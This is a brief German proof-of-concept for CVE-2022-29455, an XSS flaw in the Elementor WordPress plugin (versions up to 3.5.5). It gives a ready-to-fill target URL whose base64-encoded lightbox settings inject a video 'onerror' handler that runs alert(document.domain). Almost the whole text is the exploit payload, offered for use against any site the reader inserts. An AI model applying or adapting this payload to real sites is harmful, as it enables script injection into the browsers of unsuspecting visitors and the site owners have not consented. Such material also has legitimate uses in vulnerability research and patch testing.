
Proof-of-Concept-Exploit für CVE-2022-29455, eine Cross-Site-Scripting-Schwachstelle im Elementor-WordPress-Plugin (<=3.5.5) über eine manipulierte Lightbox-Aktions-URL.
Wordpress-Schwachstelle - XSS ( Cross-Site Scripting )
https://add your target here/wp-content/plugins/elementor/assets/js/frontend.min.js
https://add your target here/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=